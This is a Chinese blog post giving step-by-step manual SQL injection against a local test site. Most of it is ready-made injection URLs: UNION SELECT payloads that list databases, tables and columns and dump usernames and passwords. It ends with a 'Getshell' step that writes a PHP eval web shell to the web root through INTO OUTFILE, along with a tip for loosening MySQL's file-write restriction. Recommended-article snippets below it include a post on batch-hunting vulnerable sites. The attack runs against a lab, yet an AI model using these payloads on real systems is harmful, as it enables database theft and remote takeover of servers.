web渗透——SQL注入漏洞攻击步骤

最新推荐文章于 2024-04-21 21:36:18 发布
最新推荐文章于 2024-04-21 21:36:18 发布
阅读量8.7k 收藏 30
点赞数 4
分类专栏: 渗透 文章标签: 数据库 sql注入 漏洞 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dongxie_tk/article/details/78284792
版权

注入思想:

1、找到注入点:判断是否有漏洞,寻找插入位置

2、构造注入语句,并在注入点注入形成新的SQL语句

3、新形成的SQL语句提交数据库处理

4、数据库执行新的SQL语句,引发注入攻击

 

操作流程

1、寻找注入点:

http://127.0.0.1/sql/1/?id=1'

 

2、爆出列数:

http://127.0.0.1/sql/1/?id=1'+ORDER+BY+4 --+

 

 

http://127.0.0.1/sql/1/?id=1'+ORDER+BY+5 --+


3、一次性显示数据库名称、版本号:

http://127.0.0.1/sql/1/?id=1'+UNION+ALL+SELECT+1,2,3,4 --+

 

http://127.0.0.1/sql/1/?id=0' UNION ALL SELECT 1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4 --+

 

4、获取库名:

http://127.0.0.1/sql/1/?id=0' UNION ALL SELECT 1,2,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),4 --+

 

5、获取表名:

http://127.0.0.1/sql/1/?id=0' UNION ALL SELECT 1,2,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x7365637572697479),4 --+

 

6、获取列名:

http://127.0.0.1/sql/1/?id=-1'  UNION ALL SELECT1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7573657273),3,4--+

 

7、获取用户数据信息:

http://127.0.0.1/sql/1/?id=-1' UNION ALL SELECT 1,(SELECT+GROUP_CONCAT(id,username,password,lei+SEPARATOR+0x3c62723e)+FROM+security.users),3,4--+

 

8、Getshell:

http://127.0.0.1/sql/1/?id=0'  UNION ALL SELECT 1,2,3,"<?php @eval($_POST['as']); ?>" into outfile "D://Study SoftWare//phpstudy//PHPTutorial//WWW//webshell123.php" --+

 

这种情况下,是phpstudy的文件权限只可读;在数据库配置文件my.ini中的[mysqld]模块中插入secure_file_priv="D:/StudySoftWare/phpstudy/PHPTutorial/WWW"即可,其中绝对路径可以修改。

 

dongxie_tk
关注
  • 4
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
web安全-sql注入漏洞
weixin_61956136的博客
07-18 1558
web安全-sql注入漏洞
渗透测试:sql注入怎么进行报错注入
weixin_45754647的博客
05-20 103
sp:6.3 报错注入: 创建一个表练手: 下面gruop by1 按照第一个字段,分类聚合 由于rand函数的存在,每次执行结果都是不一样的 运行过程: 在这个过程中,由于rand函数会导致表不一样,因此出现重复键冲突 利用报错注入: ...
web安全之sql注入漏洞
无远弗届
03-05 846
概念 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。通俗地讲,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 注入流程简介 寻找注入点,构建特殊的数据库查询语句 系统页面可注入参...
SQL注入漏洞详解
最新发布
weixin_44756468的博客
04-21 1143
差异备份数据库得到webshell。在sqlserver里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。
Web的基本漏洞--SQL注入漏洞
尽欢的博客
05-31 3528
SQL注入介绍
批量挖sql注入漏洞
Azjj
10-08 3947
这是去年我写的一篇文章,眼看着服务器马上到期了,也没有备份,直接复制过来了,也懒得改格式了,适合新手刷洞,将就看吧文章很水,但是很实在。 关于批量挖sql注入,其实很简单,之前我在补天提交漏洞的时候,曾经在往常查阅了以下关于批量挖SQL注入的文章,其实没几个,无非就是告诉你用谷歌关键词之类的,但是搜索出来的站点挨个测试,太费时间和精力,效率太低 这里我就讲一下怎么用最省力的方式批量刷sql注入的站点 第一这里需要几个工具 ①7KBscan 爬虫机器人 (爬虫工具,种类很多,也可以自己写) ②批量检测.
张小白的渗透之路(九)-SQL注入详细操作步骤-报错注入
Litbai_zhang
11-22 596
报错注入 1.报错注入原理 构造payload让信息通过错误提示回显出来 ps: payload就是代码中最关键的数据, 比如:查找用户名,这条命令中,用户名就是最关键的数据 2.报错注入条件 查询不回显错误的信息不回显内容,会打印错误信息 update、insert等语句,会打印错误信息 3.报错注入方法 凡是可以让错误信息显示的函数(语句),都能实现报错注入,这里我们列举1种。 floor...
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章中有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffixandprefix)注入到数据库。本文将更进一步,讨论SQL...
WEB渗透——新手入门之初级工具利用
01-16
可以使用SQLMap这样的自动化工具,它能自动检测并利用SQL注入漏洞,获取数据库信息。 4. **XSS攻击**:XSS攻击通常需要手动构造和测试payload。学习如何使用Burp Suite的Intruder模块或者OWASP ZAP进行这类测试是...
SQL注入攻击——信息安全
08-20
下面将详细阐述SQL注入攻击的基本原理、攻击步骤以及防范措施。 首先,SQL注入的产生源于Web应用程序未能有效验证和清理用户输入。在正常情况下,用户请求的数据会被Web服务器转化为SQL查询,然后由数据库执行。...
WEB代码审计与渗透测试.pptx
06-10
此外,文件包含漏洞(如通过include或require)和SQL注入漏洞(通过不安全的数据库查询)是常见的PHP安全问题。 代码审计的本质在于追踪变量和函数,正向跟踪是从变量到函数,逆向跟踪是从函数到变量。通过这种方式...
网页渗透教程
04-30
SQL注入攻击者在Web表单的输入字段中插入SQL代码,以改变原始SQL查询的行为。防范SQL注入的方法包括使用参数化查询、预编译语句、输入验证以及限制数据库用户的权限。 **命令注入** 命令注入发生在应用程序不...
web 漏洞入门之 —— SQL 注入教程
实验楼
07-14 5404
SQL 注入是最常见、最被人们熟知的 web 漏洞。根据百科的解释:所谓SQL注入,就是通过把SQL命令,插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的...
web安全攻防——sql注入
weixin_67425984的博客
05-13 598
步骤一:打开虚拟机Firefox,输入网址http://110.40.154.100:8000/ 再输入网址http://110.40.154.100:8000/admin/,出现登录页,密码随意输入 步骤二:搜索安装burpsuite,打开设置,将其设为手动,点击OK 步骤三:登录Django,实现抓包,将其发送到Intruder 步骤三:在Positions中点击右侧clear5,然后框选密码add5 步骤四:点击Payloads,添加密码,随便输入多个密码,其中必有.
学习信安的渗透知识之--SQL注入渗透与攻防(二)
weixin_54975329的博客
06-06 140
SQL注入
记一次从web到内网的渗透
kukudeshuo的博客
09-28 4689
记一次从web到内网的渗透 拓扑图 环境介绍 现在有三台机器,分别为target1,target2,target3,里面分别有三个flag,每个flag的分值不同,需要通过拿下一个已知IP(target1)进而向内网里面进行渗透,最终要成功获得三台主机权限 渗透过程 target1 使用nmap进行扫描 可以看到开启了80端口 浏览器访问目标靶机80端口 可以看到就是apache的默认页面 使用dirb进行目录结构扫描 发现public页面 可以看到是thinkphp5搭建的网站,thinkphp
SQL注入流程
weixin_52180702的博客
06-26 1945
SQL是一门ANSI的标准计算机语言,用来访问和操作数据库数据库软件主要包括SQL server,MySQL,Oracle等数据库软件兼容一些主要的SQL关键词操作。 SQL注入流程。
浅谈SQL注入漏洞原理及利用方式
ZL_1618的博客
06-08 392
在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判断,导致其传入的恶意“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。漏洞产生于脚本,注入是针对数据库进行。1.参数用户可控:从前端传给后端的参数内容是用户可以控制的。2.参数带入数据库查询:传入的参数拼接到 SQL 语句,且带入数据库查询。通过SQL注入漏洞,可以查询数据、下载数据、写入webshell 、执行系统命令以及绕过登录限制等。联合注入≥报错注入>DNSlog注入>布尔注入>延时注入
web服务端安全之SQL注入攻击
weixin_30540691的博客
11-12 185
一、SQL注入攻击的原理攻击者在HTTP请求中,注入恶意的SQL代码,并在服务端执行。比如用户登录,输入用户名camille,密码 ' or '1'='1 ,如果此时使用参数构造的方式,就会出现 select * from user where name = 'camille' and password = '' or '1'='1' 不管用户名和密码是什么,查询出来的用户列表都不为空...
sql注入漏洞手工步骤
05-24
SQL注入攻击是一种常见的网络攻击攻击者利用输入的恶意字符来修改或者破坏数据库的查询语句,从而获取敏感数据或者破坏数据库的完整性。以下是手工检测和利用SQL注入漏洞步骤: 1. 确认是否存在SQL注入漏洞:在输入框中输入单引号(')或者双引号("),如果系统返回了错误信息或者查询结果,那么很可能存在SQL注入漏洞。 2. 确认注入点:通过输入一些特定的字符或者语句来确定注入点。 3. 确认数据库类型和版本:根据不同的数据库类型和版本,选择不同的注入语句。 4. 构造注入语句:根据确认的注入点和数据库类型,构造相应的注入语句,例如: - SELECT * FROM users WHERE username = 'admin' AND password = '123456' 或者 SELECT * FROM users WHERE username = 'admin' AND password = '123456' OR 1=1 5. 判断注入结果:根据返回的结果判断注入是否成功,如果成功,可以进一步获取敏感信息或者修改数据库内容。 6. 防范和修复漏洞:及时修复漏洞,并采取安全措施,例如输入过滤、参数化查询等,防范SQL注入攻击。 需要注意的是,手工检测和利用SQL注入漏洞需要一定的技术和经验,同时也需要遵循合法合规的原则,切勿进行非法攻击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值